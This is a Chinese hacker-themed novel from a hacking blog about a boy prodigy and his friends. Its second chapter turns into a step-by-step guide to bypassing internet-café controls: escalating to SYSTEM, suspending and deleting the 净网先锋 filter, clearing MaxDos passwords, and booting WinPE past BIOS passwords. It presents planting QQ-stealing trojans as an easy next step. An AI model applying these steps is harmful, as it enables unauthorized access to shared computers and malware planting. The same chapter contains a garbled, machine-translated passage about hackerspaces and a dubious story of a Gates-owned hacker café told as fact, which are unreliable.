危险漫步博客
新鲜的“黑客思维”就是从全新的角度看待黑客技术,从更高的层面去思考;专注于黑客精神及技术交流分享的独立博客。
文章2289 浏览19379018

危险漫步专为黑客新人而备的必读小说《黑客梦示录》

前言


什么是黑客?

问题只有一个,答案却五花八门,有人说黑客是计算机暴力分子,有说黑客是专门搞破坏的,有人说黑客就是神秘人,神龙见首不见尾。当然,也有人说不知道。我询问他们,黑客大概是什么样子的。得到的答案大概是黑衣黑帽黑皮鞋黑墨镜,像黑客帝国里的着装似的。

在询问的人中,只有一个回答引起我的注意,他说黑客就是指计算机技术高强的人,他们精通计算机技术,热爱探索,对网络空间有浓厚的兴趣。

我问他,是否认识黑客朋友,他点头。我接着问,他的黑客朋友是什么样的人,可否简单描述一下。

他的回答是和平常人没什么两样,唯一的区别就是在计算机前时间比一般人久些,像个网瘾少年。不过,正因如此,黑客才具有神秘性——因为神秘是无意的,让人无法察觉的,而非刻意的通过外观去修饰。

黑客究竟是什么样的?又究竟什么样的人,才能被成为黑客。本书,将带领各位读者走进一个真正的,黑客的世界。

                                                                                                                                                                                                                                                                                                                               危险漫步



第一章  汪青蓝


多年以后,汪青蓝回想起那天和危险漫步一起看海时的情形,依然觉得心潮澎湃。虽然,他已经很久都没见过危险漫步了。

蒙蒙细雨洒落在大地,清洗县城里的灰尘,空气里充满了新鲜的味道。路上行人稀少,就是零星的几人也是步伐匆忙。

县城不大,汪青蓝能数得过有很少户人家。所以父亲送他去上学的时候,他清楚他将有几个同学。那时候的幼儿园和现在不太相同。首先,名字,当时叫学前班,现在叫幼儿园。其次,时间问题。现在幼儿园有小、中、大三班,完成后进入小学,而学前班,只有一年。地方不同,学前班教学程度不同。

汪青蓝站在队尾,默默数着前面的人。十二,和他预算的一样,六岁的汪青蓝第一次觉得人生非常无趣。

“我家住西尾。每天早晨我走出院门刷牙的时候,都能闻见东头的阿户家今早放了几个屁。”危险漫步后来这样形容这个县城。汪青蓝当时似懂非懂,只觉得,自己对县城的形容只有小,在危险漫步的描述面前,确实显得渺小了。

汪青蓝还在回味这句话的意思,危险漫步继续说:“如果我的一生都锢在这里,那和被囚中阿户家的屁里,有什么区别。”对故乡有很深的情怀的汪青蓝,永远不会说出这样的话。不过,危险漫步不同。他有这个资本。当然,这是汪青蓝后来才发现的。

队伍变得有些嘈杂,汪青蓝看见最前端的阿户和他身后的小虎已经打起来了。

迟语尖叫着把两个人拉开,又返过身去管一年级的纪律。自然,阿户小虎又扯到了一块儿,难分难解。队伍更乱,窃窃私语变成光明正大的聊天。

雨过天晴,外面的阳光亮得有些刺眼,汪青蓝忽然意识到一个问题:他所预设的十二个人,是班里将会有十二个学生。他刚刚并没有数他自己,如此一来,便比预算中多出了一个。

汪青蓝猛得抬头,再次打量着队伍。重新点了三遍,才发现那个让他的生活变得有趣的人。他在队伍偏后的位置,两只手插在口袋里,低着头,一个人默不作声。如果不是特意寻找多出来的人,汪青蓝不会发现他,但此刻,他在一群烦喧的孩子间,竟如此出众。

汪青蓝从未在县城见过他,生性活泼的汪青蓝常常游弋于这个城市的大街小巷,所以看到从未谋面的同龄人,他感到异常地奇怪。孩子的身体总是比成人更为活跃,其实,思维也是如此。汪青蓝想自己应该如何和他打个招呼,这时,校长腆着啤酒肚进来,一年级的学生顿时变得安静。迟语慌慌张张地跑向学前班队伍这边,和校长打了个招呼,又做手势示意学前班的孩子安静。

校长笑眯眯地站在门口,教室里的秩序却一下子好了许多。学前班和一年级的学生共享一个教室,其中,第一组坐学前班,第二、三、四组坐一年级的。那个人做到了最后一排,汪青蓝带着好奇的心理,坐到了他的旁边。

学前班的生活很无趣。学生的日常是抄写汉语拼音,抄完给老师批改,老师会评写“甲”“乙”“丙”“丁”。如果是甲,后面还可能画有几个五角星标记,五角星越多,自然表示越好。

孩子们抄写汉语拼音颇为不愿,可是老师批改过的本子发下来时,却又迫不及待的看着自己的甲后面放里几个五角星。

整个学期,没有人得过乙,或者更低,除了汪青蓝的同桌,危险漫步。

第一天,老师给汪青蓝打了甲,危险漫步也是甲。第二天,汪青蓝甲+二星,危险漫步也还是甲,不过底下有一行评语:字写得认真些。危险漫步并不在意,他甚至没打开本子,他的评语是汪青蓝告诉他的。

危险漫步看着他的同桌,轻轻地说了句谢谢。随后问他叫什么名字。汪青蓝说,我叫青蓝。汪青蓝。

他哦里一声,又补了句,谢谢你,汪青蓝。

第三天,汪青蓝得甲+三星。危险漫步得里一个丙。更糟糕的是,这次翻开他作业本的是阿户。阿户得了甲+四星,他四周的人没有得过四星的,但他还想确定班里其他学生的成绩,于是挨个翻看作业。

最后。

“嘿,看呐,危险漫步得了块饼!”

哄然大笑。

汪青蓝想冲过去教训阿户一顿,危险漫步拦住了他。他走到阿户的面前,问阿户:“得四星甲,很荣耀是么?”

阿户比危险漫步高半个头。当时的汪青蓝并不理解是什么力量让阿户畏惧面前的人。阿户脸色有些苍白,支支吾吾说一些别人听不懂的,断句碎语。

“人们总在追求甲加,如果可以,我只求安安静静得一个癸就好了。”危险漫步说完后,就去了迟语的办公室。

汪青蓝不清楚他们那天都说了些是么,只记得那天的雨一直沙沙地落个不停,雨不大,但是很长时间都没有间断过。后来危险漫步上课时都不用再抄写汉语拼音了,他总是一个人在本子上写一些数字。有时候他会拿一本书来读,书的名字汪青蓝已经忘了,只记得它很厚,里面密密麻麻的字。听一年级成绩最好的学生说,危险漫步读的是一本和魔术师有关的书,大致是魔术师的传记。

后来,汪青蓝曾跑遍市里的书店,和省里的图书馆,除了一身灰尘,毫无收获。大概,那本来就不是本魔术师的传记吧。

汪青蓝和危险漫步成了很好的朋友,至少,他是这么认为。在汪青蓝幼年有限的记忆里,危险漫步的确是汪青蓝最好的朋友了。可是,危险漫步与汪青蓝所认识的所有的人都不一样,他们关注的重点偏差很大,阿户可以为四星甲高兴得一蹦三尺高,危险漫步却不以为意。县城的学前班教学程度有限,它教不了知识,它甚至连教学生的老师都抽不出。学前班的班主任是迟语,她也是一年级的班主任。她除了教学前班学生写汉语拼音,再没教过他们半点知识。老师们,是一年级的老师们,学前班的他们只是顺带被看一下罢了。危险漫步危险漫步深知这些,他清楚就算作业本上写满了星,也不过是敷衍的符号,如果注定是个符号,那他宁愿选个没人和他争的。

因为他种种易于常人的想法,所以汪青蓝无法给他的内心下任何结论,也无法判定危险漫步究竟是怎样的一个人。汪青蓝只能沿着他们共同走过的轨迹,追忆起他的样子,追忆他内心曾与他坦白的,最纯真纯粹的想法。

闲暇无事的时候,汪青蓝常和其他的伙伴们在学校东边五百米的空场上做各种游戏,危险漫步从不会加入。他独自在家里。如果汪青蓝邀请危险漫步到他家里玩,危险漫步也会同意。可是汪青蓝的家里并无任何有趣的东西——除了那台小霸王游戏机外。

于是危险漫步到汪青蓝家里,除了打游戏,还是打游戏。小霸王在孩子们之间还是很流行的。两个人一起打通了很多闯关游戏,只有一款叫越狱的格斗游戏无法通关。每次打到第三关过半的时候,四周的狱警就会增多,他们深陷人海,最终任务失败。尽管尝试多次,但是两人依旧无法摆脱命运的大门。游戏的主角耗尽“血值”,身陷囹圄。

 这件事成为他们的一件憾事,本以为两个人会所向披靡,可是越狱,却成了他们面前的第一座大山。

汪青蓝和危险漫步反复研究,发现闯关的时候,第一批出现的人顺序是固定的,接着来的狱警(即敌人)人数时间根据他们第一批击败的狱警人数时间来定。敌人虽然人数众多,但是战斗力普遍不高。知道这一点后,两个人便研究了一个战术,利用紧密的配合破解人海战术。小霸王游戏不像后来的3D游戏全方位攻击,游戏角色被伤害的方向只有上下左右四个。在越狱中,受伤害的点有三个:前后,天上。只要战术规划得好,以不变应万变,人海战术终将被撕破。

经过反复的模拟验证,汪青蓝和危险漫步设计了一套方案,几次磨合之后,终于通关。越狱一共四关,第四关中间同样有个人海战术。不过,对于掌握核心技巧的两个人,人数多少不过是多耗费一点时间而已。

学前班的结束比一年级来得早些。校方象征性的给了他们一个考卷。内容分两部分,第一部分是抄写示例的汉语拼音和汉字,字迹给分。第二部分是写除了示例文字以外的汉字,给出的格子是二百格。除了危险漫步写满之外,无人写满。

时间回到危险漫步去迟语办公室的那个下午。他向老师要了一份去年的试卷,写完后,迟语满足了危险漫步的要求,允许他上课不打扰他人的情况下,做自己的事。只要最后目的完成,那么完全不必沿着繁琐的过程走。节约下来的时间可以用来做更有意义的事,危险漫步称之为相对自由。

学期结束后,危险漫步带汪青蓝去他的家里,他邀汪青蓝打一局越越。危险漫步的家里没有小霸王,只有一台计算机。汪青蓝有些不太习惯键盘,危险漫步带着歉意说,“不太好意思,现在的我,还做不出智力卡。”

汪青蓝适应得很慢,频频失误,若不是危险漫步相助,恐怕早就Game Over了。

一路坎坷,风风雨雨但还是坚持了下去,汪青蓝很担心第三关那个难点,使用键盘的他,还能像往常那样配合么?

画面中,一个身着深青色的警卫从左上方跳了下来。开始了!汪青蓝心里一紧,不免撇了撇身边的危险漫步。危险漫步满脸自信,带着浅浅的笑容。

屏幕上的警卫一步步地接近他们,正当汪青蓝准备对敌人发动攻击的时候,却发现敌人在离他们一步之遥的时候停了下来。汪青蓝向前一步,敌人随之向后退一步,如果汪青蓝向后退,敌人便向前进。总之,敌人会与汪青蓝保持一步的距离,但不会发起攻击。

“走吧。”危险漫步说。“他们将我们一起走下去。”

后面的关卡就变得很简单,警卫都成了他们的伙伴,一路畅通无阻。

结束之后,汪青蓝才知道危险漫步把游戏改了,FC游戏体重不大,读起来相对容易。

汪青蓝看着身后壮大的队伍,非常激动,危险漫步看起来却很平静。他透过洁净的玻璃,看着外面飘摇梧桐。半晌,他提议去海边走走,汪青蓝欣然同意。

晴光一片。外面风很大,傍晚的小县城,热热闹闹。汪青蓝看见祥和的老爷爷在路边下棋,听见家长吆喝孩子回家的声音。街边有个大叔在用糖稀画龙,围观的人熙熙攘攘。南街的烤羊腿又出了一锅,香喷喷的羊肉味进入鼻息。汪青蓝愉悦地欣赏着小镇的一切,感受故乡的温暖。

危险漫步已没了刚才高兴的样子,他神色凝重,又有点心不在焉。

“怎么了。”汪青蓝问。

危险漫步摇摇手,说没事。走了几步,忽然停下了。他折身绕到一个废弃的院子的后面,然后翻过破败的院墙。汪青蓝跟了过去。这是条小路,从这里向海边走,可以节约一半的时间。翻越后面的院墙,汪青蓝已经可以闻见淡淡的海风吹来的味道。

不过,过了这个院墙,前面完全是野路了,林深地滑,勇气不够的人一定会跌跤的。多年以后,汪青蓝再回到故乡时,这片当年他曾畏惧一个人走的深林,已经高楼临里。他站在外围仰视着大楼,寒意更深。他爬上大楼的天台,耳朵只有永不停息的风声,曾经可以隐隐听见的浪涛声,在年月里沦没。

“青蓝,走了哦。”

回过神来,汪青蓝才发现危险漫步已经领先他很久了。眼前的路,或曲或直。他追了过去。

波澜壮阔的海面,浪涛涌起。海风在耳边呼啸,天上的云彩被撕得无影无踪。蔚蓝的天空下,无边无际的大海,让人不禁发出像《观沧海》里一样的感慨:

日月之行,若出其中;

星汉灿烂,若出其里。


 第二章  林雨生


“家里有电脑的同学把手举一下。”

杨老师说完,班里一半同学呼啦啦地把手举了起来,她简单地扫了一眼,便让同学把手放下去。

杨老师大概只是为了了解计算机在学生家里的普及率。接着,她开始讲电脑的常识性知识,以及这一年新增的课为什么叫微机课,而非电脑课。

危险漫步刚才并没有举手,老师查看班里计算机普及率并无不妥,可是,一个班上区区五十个学生,对他而言,实在是太少了。

小学的课程很松,危险漫步忙碌于编程和C语言,功课无暇顾及。虽然基础比别的同学高出很多,但禁不住长久的荒废。至于微机课,他则很小心地把能力控制在和同龄人相同的水准,这种像酝酿阴谋一般的小心,真相最后在毕业的时候才露出水面。

平日,危险漫步常混迹于网吧之中,实践他从各处学来的知识。这天上午,危险漫步听前排的同学说某家网吧的净网先锋既弹广告又下木马,辛辛苦苦玩的游戏号被“脱”的一丝不挂,着实让人心里感觉有些不平衡,按说在六部委的严厉打击以及相关法律的出台下这样的事情应该极少了,但事实上外界的环境只是给“盗号”加了一道坎而已,真正的“战争”远没有结束。作为后排,危险漫步岂能袖手旁观?他请假家,下午便又跑到网吧进行探索。

付款上机,网吧中使用的是深度的ghost版WindowsXP系统,第三方管理软件使用的是PubWin2007+净网先锋。一开机,净网先锋就弹出了广告,使用360安全卫士扫描内存,并未发现有盗号木马,前排说是晚上弹广告的次数多盗号木马也多,危险漫步猜想这可能和原来买卖流量的事情差不多,只有一段时间弹出木马广告页,不过就算没有盗号木马,这一会儿一弹的广告网页也让人很是气愤。

据悉,东洲所有的网吧都必须安装这个垃圾软件,属于政府性行为,到网上搜索了一下净网先锋的相关信息,结果发现借用此软件盗号早已经不是什么新鲜事了,某帖吧里的咒骂声不断,由此可见一斑,危险漫步决定首先搞定这个净网先锋,让它不弹广告,卷铺盖滚出系统。

还是使用老办法,通过提升explorer.exe外壳程序的权限为system权限来突破常规的网吧限制。目前来说这种突破限制的方法的通用性依然很强,使用范围主要是在网吧,网吧中通常使用的都是XP系统,很少碰到使用Vista或Windows7系统的,更何况即使是在Vista系统中,也可以使用该方法,只是操作相对复杂了一些而已。

在“开始”——“运行”栏中输入cmd.exe打开命令提示符,准备好mt.exe,按CTRL+ALT+DELETE键打开任务管理器,结束掉explorer.exe的进程,然后在cmd下执行mt -su explorer.exe,等待shell运行,这时就会发现托盘区已经没有净网先锋的图标了。继续执行dir /s /a mainpro.exe查找净网先锋主程序的文件位置,mainpro.exe就是净网先锋的主进程文件名,危险漫步发现是在system32文件夹下,执行del /f mainpro.exe删除时却提示“拒绝访问”,执行cacls mainpro.exe命令查看该文件的访问权限,发现当前用户有“完全控制”权限,看来没有了图标并不能代表进程已经结束了,同时,这也纠正了危险漫步的一个误区,原来Windows的外壳程序explorer.exe在创建进程时,创建的都是与explorer.exe无父子关系的进程,也就是说explorer.exe创建的进程都是独立于explorer.exe进程的,结束explorer.exe并不能结束掉所有由它创建的进程。查看任务管理嚣中的确存在mainpro.exe的进程,结束后进程立刻重建了,看样子,提升权限只是治标不能治本啊。

危险漫步回到百度,一搜才发现原来网上还有一种净网卸载器,下载后运行,净网先锋再次运行了,看来想通过工具“偷懒”也没那么容易。

危险漫步懒得耽搁时间,直接抄家伙,下载进程管理利器——process explorer.exe,双击运行程序后,界面一闪而过,这是有系统的敏感字符检查所导致的,这种现象在各大网吧已屡见不鲜,改改程序文件名就能避开检测了,修改程序名为test.exe,这回成功的运行了程序,将mainpro.exe进程结束掉,净网先锋再次运行了,看来应该是有外部进程创建,下载syscheck.exe,选择mainpro.exe进程,然后勾选“禁止外部线程创建”,结果syscheck检测测到mainpro.exe由xclient.exe创建,而且很快系统因为大量线程创建而导致了死机,运气看来不怎么好。危险漫步想,以后再在网吧中进行“居心叵测”性操作时,一定要带着U盘,将需要的工具及时保存,以防止重启后的重复操作。

关于xclient.exe这个程序,网上给出的说明太模棱两可,危险漫步把它扔到一边。既然知道了父进程是xclient,那么最好的方祛就是直接杀死它,但这种方法很快就被操作失败所否定了,这时他眼前突然一亮,如果直接使用process explorer.exe挂起mainpro.exe的进程,那么mainpro.exe就无法做任何事情,这和卸载净网先锋应该是有相同的效果,而且一般用户在网吧玩的时间也不会太久,所以这应该算是一种比较“经济”的方法了。当然如果能挂起mainpro.exe,那么就也可以挂起其父进程xciient.exe,挂起xclient.exe后,它就无法创建mainpro.exe进程了,这样就可以先结束mainpro.exe然后再删除它。

使用process explorer.exe挂起xclient.exe的进程,然后结束mainpro.exe,再使用del命令成功删除了净网先锋。现在总算是让净网先锋不再耍流氓了,这里也提供给大家一种新的处理进程外部创建线程的方法,先挂起父进程,然后结束子进程,很多时候很多事情和做人一样,不能太偏激,使用折中的方法往往会事半功倍。

危险漫步开机时还注意到有个MaxDos(MaxDos主要就是为安装好的Windows/XP/Vista等加入DOS系统)的选项,后来分析测试了一下,发现这里面的道道还真不少。

该网吧使用的是MaxDos7.1的版本,危险漫步记得以前5.5版本的密码是可以破解的,但是7.1版本虽然使用的MD5加密,但却不是标准的MD5加密算法,所以想通过MDs网站比对密码散列是不可能的,网吧的MaxDos文件夹其中的maxkr文件即为MaxDos的密码文件,使用记事本打开。

MaxDos的安全问题主耍体现在密码的安全性上,对于MaxDos的密码破解有两种常规方法:

一是MaxDos弱口令问题,管理员为了使用方便,有时会设置一些弱口令,有的甚至可能与Windows登录密码一致或者是一些非常简单的数字密码,这就给了反击网吧限制的机会。

二,MaxDos7.1的密码文件可以被清空,因此可以先破解掉网吧的还原系统,然后再清空MaxDos密码文件中的内容。

针对这两种常见的安全缺陷,可以通过测试弱口令来确定密码,还可以先通过MaxDos生成可能的密码散列值,然后再通过比对散列值以确定密码。其二就是通过其它方法搞定还原系统,再利用密码替换来实现密码的破解。

危险漫步曾测试过第二种方法并获得了成功,即MaxDos7.1的密码散列文件确实是可以被清空的。对于第一种方法,他想这完全在于使用者对当前环境的弱口令收集。

其实,MaxDos充其量只能算是一个网吧维护工具,它提供了一种独立于Windows操作系统的网吧玩法,而目前一般来说用户比较喜欢WinPE系统,简单的说WinPE就是一个可以简单的运行于U盘、光盘上的小型Windows系统,只需要有一个U盘,将WinPE装入其中,在网吧中通过U盘来启动WinPE系统,然后就可以进行各种限制的突破了,别说是一个净网先锋,就是把系统内核文件全删除了都行,这要比破解MaxDos密码简单有效的多,但是这种方法也存在局限性,一是必须要有硬件支持U盘启动,对于这点一般的网吧都能达到,如果是古董级的网吧……

第二点就是可以进入BIOS。一般来说网吧电脑的BIOS密码要么是默认的,要么就是简单的要死,还有的干脆就没有设置,当然也有设置的很难破解的,这也要看运气了,毕竟任何破解方法都不可能是万能的。

下面再介绍一下使用这种方法的U盘启动工具的制作流程。

需要的工具就是flashboot+Mini WinPe镜像,具体的操作如下,运行flashboot,选择“转换BarPE的启动盘到闪盘上”,下一步就是选择PE镜像文件,之所以建议使用Mini PE,是因为它比一般Ghost版Windows操作系统中的PE要小,执行效率高,速度快。接下来选择U盘盘符和U盘格式化类型,有USB-HDD和USB-ZIP两种类型,ZIP兼容性好,一般可以先选择ZIP,如果选择ZIP不能引导那就使用USB-HDD,选择好后就会自动生成启动U盘了。

来到网吧中,先搞定BIOS密码,然后进入BIOS,将启动顺序设置为“Removeable Devices”,这样就可以从U盘启动WinPE了。曾几何时,为了在网吧的电脑中放上啊拉QQ大盗,不惜花时间去破解还原系统,有了这种方法后,可以修改Windows启动时所加载的项目,休想放多少木马都可以,如果挂上个网页木马,那就更快乐了。

综上所述,不管是从MaxDos下手还是从WinPE入手,问题的关键都是密码,危险漫步在实践与学习中逐渐向前,脚踏实地的确是非常有必要的。

很久以来危险漫步一直认为只要是自动登录,那么用户的登录密码就一定在注册表中,使用它们就可以进行注销登录以及通过Logon session缺陷来攻击其它客户机。不过,这次他上网的网吧中显然杜绝了这种方法。首先危险漫步想通过注销的方法来实现所有限制的突破,但是当他运行该软件时却显示了错误,双击打开“我的电脑”,将“工具”——“文件夹选项”——“查看”中的“使用简单文件共享(推荐)”前面的勾去掉,这样可以看到文件“属性”选项中的“安全”选项,结果却发现根本无法修改该程序的权限,即便是将文件所有者修改为当前用户,也总是提示错误,当他从其它的站点再次下载该程序,同样的问题再次出现了。修改程序名运行也还是出现了相同的问题,这说明不是程序本身的问题而应该是管理软件所导致的,既然此路不通只好再换条路了。

或者可以通过提升权限或者使用金山毒霸来将其修复。首先电脑没有注销,就是开机时的状态无注销选项,第二是提升权限后的有注销选项,第三是使用金山毒霸的修改功能。使用权限提升方法突破注销限制后,电脑会突然变的反应缓慢,需要等N久才会提示要注销,使用第三种方法进行注销登录时,输入自动登录的用户名和密码会无法登录。

一,使用psr密码查询工具,自动登录的用户名和密码虽然能够找到,但是注意缓存密码为rzxskj,也就是当前的会话验证是以rzxskj作为密码的。

二,在注册表中以及使用peekpassword发现的自动登录的用户名为fikj,密码为8777858dong。

三,在“开始”——“运行”栏中输入compmgmt.msc打开计算机管理,在“本地用户和组”的“用户”中发现只有两个用户。 

因为系统只有两个用户,并且其中一个还是禁用的,因此当前登录用户是rzxskj,密码应该是rzxskj,而自动登录密码完全是一个无用的信息,使用rzxskj用户名和密码rzxskj注销后登录成功。 

无论何时,用户名和密码都是进行任何其它操作的基础,因此一定要保证用户名及密码的有效性.还是推荐使用psr强力密码工具,有时候注册表“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon”键下的内容是会骗人的。

临近期末,最后一个考试将影响升学。到学校之后,林雨生没坐回自己的位置上复习功课,而是走到危险漫步的桌前。危险漫步的成绩在班里中等偏下,他是个缄默的人,不爱与人交谈。他的位置也是靠后一点,一个临近窗子的位置。

他抬头忘了林雨生一眼,说:“以后再买赵记糕点家蛋挞的时候,记得给我带一块。我觉得这个要求并不过分。”

林雨生惊讶地驻足,看着危险漫步,他怎么知道自己去赵记买了蛋挞了?

林雨生问危险漫步中午怎么回去了,他这次连头都没抬,目不转睛地盯着窗外。

“我中午从不回家的。”

“那是谁告诉你的?”林雨生问道。

“没有人告诉我,你买个蛋挞而已,谁会特意记下来,然后特意再跑来告诉我?”

“那你是怎么知道的?”林雨生愈发觉得不可思议。

“没人告诉我,我也没亲眼所见,就很难知道么?”他终于回过头来,看着林雨生。林雨生不太喜欢那种眼光,他觉得有种挑衅的味道。

“你是个很自律的人,你成绩一直名列前茅和它有很大的关系。夏令时,你每天到校的时间都是两点十分。现在已经两点二十七了。你以前说过,周五是你老妈给你零花钱的日子吧。一般来说,你不会乱花,除了偶尔嘴馋买些零食吃,蛋挞,是你很喜欢的一种。这三天,赵记搞一周年庆的活动,前天下雨都排队,今天好天,当然不会例外。一般来说如果有事你会提前一些出门,但是队伍的长度显然超过你的预想,以至于你晚到了十二分钟。”

危险漫步说的是事实,任何的话林雨生都无法否认。此刻他才清楚眼前的人,不仅仅是电脑蛮好的而已。或许,他多得是林雨生不知道的一面。

“其实这没什么大不了的。”危险漫步继续说,他的头又转回去,继续看着窗外。“柯南道尔在他的生活宝鉴里说,‘生活就像一个巨大而完整的链条,只要窥见其中一环,余下链条的情况就完全可以推断出来了。’如果你也能精确系统地观察你所接触的事物,那么你将有非常大的收获。

“你的计算机差不多可以了,明天我不出门,你有时间的话可以过来拿。还有,我帮你,是因为我觉得你值得我帮忙,你身上的某些品性值得我欣赏。而不是我是一个修电脑的,更不是一个免费的修电脑的。”

林雨生愣愣地杵在原地,不知道要说什么。危险漫步一边把课本拿出来,一边让林雨生回去。转过头看,老师已经进教室里,四周一片寂静。林雨生忽然有点适应不了这份寂静,刚刚明明还是一片哄吵。老师是什么时候进来的?自己为何没有察觉?

那个下午,林雨生没听进什么。好在新课已经结束,全是复习的内容。

晚上放学的时候,危险漫步和林雨生顺路一起回家,危险漫步讲了一则关于黑客的故事。

在英国,有一家咖啡馆叫做数字时代。他的负责人是英国著名的网络安全专家,托马斯·彼得。这家咖啡馆的幕后大老板就是大名鼎鼎的世界首富比尔·盖茨。这家咖啡馆有一个奇怪的规定——只对黑客开放。只有收到他邀请的人才有资格进入这家咖啡馆。在这里是一个有专业黑客组成的小世界。

在数字时代里面的黑客,他们致力于破解那些有流氓黑客开发的恶意软件。目前数字时代共有2000多名会员。他们在这里利用他们技术追踪并且破坏哪些流氓的恶意行为。他们认为黑客与技术无关,重要的是你是否拥有道德的底线。

即使在黑客和网络革命的世界,他们也会在电脑中赢得自己的一席之地,并且通过自己的努力成为中产阶级。

然而有些时候,黑客们也会意识到自己手中权利。其中就有一个黑客指出比尔·盖茨,通过微软这个强大的公司成为世界上最富有的男人,并且将微软变为世界上最大的IT行业公司。而他花了五年的教学积极分子如何安装和使用该服务以避免被镇压被监控政府。现在,他自己经常被美国政府针对他与维基解密的关系。

黑客空间不只是与电脑黑客。理想可以应用到生活中包括政治的各个方面,这被认为只是一个“体系”由人类生活在一起。像任何其他的系统,因此它可被黑客入侵而这些空间提供政治黑客实时实验。它们通常包含电动工具,工业切割机,缝纫机和“烹饪黑客”有时甚至厨房。在布达佩斯的小众创HACK(匈牙利自治中心知识),成员已经建立了一个电子系统plantwatering,在芽在马萨诸塞州剑桥市,我看到了一个麻省理工学院的学生建立一个喷气推进器。在大的空间,如Noisebridge在旧金山成员已经创建了一个活跃的空间探索计划发送气象探测气球,在天空到70,000ft收集利用GPS智能手机和数码相机的图像和数据。空间的访问和成员通常是由共同商定的规范约束,但明显还缺乏正式规则。问权限后,因为它意味着权力的不平衡皱起了眉头。所选择的方法是观察培养,然后寻求达成协议。

这是黑客的世界,很神秘也很喧嚣。

林雨生听得不是很懂,危险漫步讲的很多词他都没有概念。危险漫步并不着急,他慢慢地讲诉着,然后和林雨生解释名词的意义。一路上,危险漫步的嘴角一直带着微笑,意味深长。

第二天,林雨生去危险漫步家里拿电脑的时候,危险漫步没什么异常,反倒是林雨生,莫名其妙地慌张。临别的时候,他把他叫住,说了一些很奇怪的话。危险漫步叫林雨生电脑不要扔掉,哪怕是以后换电脑的时候,一年最少也要开一次机。

回去的路上,林雨生抱着熟悉的主机,觉得它异常沉重。危险漫步要以后每年最少开一次机,是什么意思?

初蝉已挂于树干,鸣叫声相当聒噪。整个周末,林雨生的耳边都是烦人的蝉鸣,无法自拔。

周日的晚上。林雨生做了一个梦,他不知道梦中的他深处世界的哪个角落。角落是黑暗的,除了脚下发着刺眼光芒的路。林雨生行走在光的路上,四周一片寂静,他想起了一个喧闹的黄昏,自己坐在一棵巨大的树下,老树的树根从地理突起,形成天然的长凳。他倚着树根躺下,抬头仰望,透过浓密的树叶,夕阳斑驳的色彩。

一瞬间,四周响起了蝉鸣。天地间只剩这蝉鸣,响彻云霄,整耳欲聋。

林雨生昏昏沉地睡去,在光的路上醒来。他踌躇着往前走,路越来越多,能看见的地方也越来大。无边无际的黑暗,和纵横交错的光之路。

一个人的背影出现在林雨生的眼前,那个身影向前奔跑,林雨生听见了风的声音。 

是危险漫步!

林雨生跟了过去,大步地追着他。

忽的,他消失不见。 

林雨生又坠入了无边的黑暗。


第三章  汪青蓝(二)


你怎么了。

汪青蓝又问了一遍。他总觉得,危险漫步带他来这里,像是完成一种仪式似的,那样严肃。

危险漫步说:“你知道,我为什么要用计算机和你打游戏,而不是用你家里的小霸王打么?”

汪青蓝说:“不是因为你做不出卡么?”

不全是。危险漫步这样说。FC游戏已经开始走下坡路,它对于玩布娃娃玩木偶的孩子来说,的确具有吸引里,但它已经没有上升的空间了,无法分享将是它致命的弱点。它像一个灿烂的烟火,最美的一瞬间过去了,等待的,只有没落。

危险漫步形容计算机是璀璨的灯,只要有电,它可以以各种形式闪耀。

路危险漫步不希望汪青蓝继续单机的游戏,他希望他可以走进更大的世界。

“计算机有一片前景,若干年后,世界将离不开他——如果硬说现在世界已经离不开他了也没有什么错误。但是那时候计算机因为普及,所以,这句话不会像现在这样有点勉强。

“游戏这不过是计算机一个很小的娱乐分支。但是却是FC的全部。等世界都燃起计算机的光火之后,FC只能打感情牌。很遗憾,但这是事实。”

汪青蓝有些听不懂,不过,他已经习惯了危险漫步对他说一些听不懂的话。危险漫步问汪青蓝是否明白乘风破浪的意思。汪青蓝说不懂。危险漫步接着问海阔天空呢。汪青蓝依然不懂。

波涛汹涌呢?危险漫步接着问。

这个懂。

那时候的汪青蓝,只懂这个。危险漫步问汪青蓝是否明白这成语的意思。汪青蓝说,不就是形容大海么。危险漫步笑了,汪青蓝搞不懂他在笑什么,他看见危险漫步的瞳孔里映出的浪涛。后来,汪青蓝学到了一个词,洪波涌起。

危险漫步说,他要征服它。然后拿起一块石头,掷入海中。

可是危险漫步要走了。入秋后,他要去市里上小学。而汪青蓝家里人给他的规划则是让他小学初中都在县里。两个人都沉默起来,海鸥在海面上自由地飞行,而他们却不能像海鸥一样,自由地飞行。

危险漫步说:“飞得起来,都飞得起来。等你明白海阔天空的意义,那时候的我们,再一起同行。等我明白乘风破浪的一样,我们便一起同行。以后,我或许不会再像信任你一样的,信任别人了。”

一天下午,汪青蓝正在家里打游戏,忽然听见一声巨响。刚开始他还没有太过在意,不过外面很快变得哄嚷起来。汪青蓝出门一看,发现人群都往一个方向奔涌。他跟了过去。

小虎家门外围了很多人,汪青蓝先跑到高出眺望里会儿。发现他家灶房的屋顶整个不见里,只有大梁突兀得横着。汪青蓝继续向小虎家跑,听路上的行人说,小虎家的煤气罐炸了,瓦屋的屋顶直接被掀翻!围聚的人越来越多,万人空巷。危险漫步家在小虎家隔壁的隔壁,汪青蓝本想叫危险漫步一起过去。危险漫步坐在电脑前面丝毫不为所动,他房间的玻璃被震得四分五裂,外面的花坛上落了不少玻璃碎片。危险漫步很沉静,仿佛什么都没有发生。他只叫汪青蓝一个人去,见汪青蓝惊讶,他接着补充:“玻璃碎了而已,等会儿换一块就是。没什么大惊小怪的,又不是我显示器的屏碎了。”

汪青蓝的父亲给他讲过的一个故事开始在他脑海里浮现:

管宁和华歆是一对非常要好的朋友。一次,他们在菜地里锄草。管宁从地里刨出来一块金子,看也不看,就丢到了一边,华歆却丢下锄头,拾起金子捧在手里仔细端详。

管宁责备华歆说:“钱财应该是靠自己的辛勤劳动去获得,有道德的人是不可以贪图不劳而获的财物的。”

华歆听了,下了很大决心,才把金子放下。管宁看在眼里,暗暗地摇头。

又有一次,他们坐在一张席子上读书。忽然外面热闹起来,华歆起身走到窗前去看究竟发生了什么,管宁却不为所动,继续读书。

原来是一位达官显贵乘车经过,车辆豪华,而随从们佩带武器,前呼后拥,威风凛凛。

华歆被张扬的声势和豪华的排场吸引住了。他嫌在屋里看不清楚,干脆连书也不读了,急急忙忙地跑到街上尾随车队细看。

管宁再也抑制不住心中的叹惋和失望,他拿起刀子当着华歆的面把席子从中间割成两半,痛心地说,从今以后,我们就像这被割开的草席一样,再也不是朋友了。

汪青蓝犹豫起来,爆炸的煤气罐对他有很大的吸引力,可是眼前危险漫步冷冷的态度又让他逡巡不前。

